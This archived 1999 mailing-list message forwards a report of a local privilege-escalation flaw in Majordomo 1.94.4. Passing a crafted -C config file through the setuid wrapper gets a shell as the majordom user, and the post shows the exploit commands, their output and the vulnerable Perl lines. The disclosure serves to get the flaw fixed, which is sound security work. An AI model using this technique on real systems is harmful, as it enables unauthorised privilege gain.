--DKU6Jbt7q3WqK7+M Content-Type: text/plain; charset=us-ascii While browsing the majordomo lists trying to find out if anyone is taking care of this issue, I came across another that's in their archive (appended below). The comment of Dave Wolfe was that you shouldn't let untrusted users run programs on his majordomo server. Olaf -- Olaf Kirch | --- o --- Nous sommes du soleil we love when we play okirat_private | / | \ sol.dhoop.naytheet.ah kin.ir.samse.qurax okirat_private +-------------------- Why Not?! ----------------------- UNIX, n.: Spanish manufacturer of fire extinguishers. --DKU6Jbt7q3WqK7+M Content-Type: message/rfc822; charset=us-ascii Content-Disposition: attachment; filename=cf-flaw >From majordomo-workers-owner Fri Dec 3 13:13:01 1999 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-980720-1) id MAA00667; Fri, 3 Dec 1999 12:57:46 -0800 (PST) Received: (mcb@localhost) by honor.greatcircle.com (8.8.5/Honor-980202-1) id MAA00657 for majordomo-workersat_private; Fri, 3 Dec 1999 12:57:44 -0800 (PST) Received: from tirin.openworld.co.uk (tirin.openworld.co.uk [194.207.107.233]) by honor.greatcircle.com (8.8.5/Honor-980202-1) with ESMTP id NAA13922 for <majordomo-workersat_private>; Thu, 2 Dec 1999 13:55:01 -0800 (PST) Received: from localhost (shevek@localhost) by tirin.openworld.co.uk (8.9.3/8.9.3) with ESMTP id WAA03319 for <majordomo-workersat_private>; Thu, 2 Dec 1999 22:00:48 GMT Date: Thu, 2 Dec 1999 22:00:48 +0000 (GMT) From: Shevek <shevekat_private> X-Sender: shevekat_private To: majordomo-workersat_private Subject: $cf Security flaw Message-ID: <Pine.LNX.4.10.9912022150430.1186-100000at_private> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: majordomo-workers-ownerat_private Precedence: bulk Status: RO Content-Length: 1640 Lines: 61 I can get majordomo privelidges as a user. shevek@tirin ~$ cat foo.pl system("/bin/csh"); shevek@tirin ~$ /usr/local/majordomo/wrapper majordomo -C /home/shevek/foo.pl % %whoami majordom root@tirin /usr/local/majordomo# ls -ld . drwxr-x--x 6 majordom daemon 1024 Dec 2 21:49 ./ root@tirin /usr/local/majordomo# ls -l wrapper -rwsr-xr-x 1 root daemon 6630 Jul 12 11:21 wrapper* The lines in Majordomo (I found the bug by simple inspection, it's also in resend) $cf = $ENV{"MAJORDOMO_CF"} || "/etc/majordomo.cf"; while ($ARGV[0]) { # parse for config file or default list if ($ARGV[0] =~ /^-C$/i) { # sendmail v8 clobbers case $cf = $ARGV[1]; shift(@ARGV); shift(@ARGV); } elsif ($ARGV[0] eq "-l") { $deflist = $ARGV[1]; shift(@ARGV); shift(@ARGV); } else { die "Unknown argument $ARGV[0]\n"; } } if (! -r $cf) { die("$cf not readable; stopped"); } require "$cf"; Am I doing something wrong, or is this a general flaw? Can I simply disable all the possible methods of setting $cf without breaking other things? I haven't had time to inspect the system at any length, I just glanced at it. I am not on any greatcircle mailing lists, I would appreciate replies to my own address if there is discussion on this subject. Majordomo version 1.94.4 Perl 5.005_03 Ta. S. -- Shevek GM/CS/MU -d+ H+>++ s+: !g p2 au0 !a w+++ v-(---) C++++$ UL++++$ UB+ US+++$ UI+++$ P+>++++ L++++$ 3+ E--- N K !W(-----) M(-) !V -po+ Y+ t+ 5++ !j !R G' !tv b+++ D++ B--- e+ u+* h++ f? r-- n---- y? Recent UH+>++ UO+ UC++ U?+++ UV++ and collecting. --DKU6Jbt7q3WqK7+M--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:24:18 PDT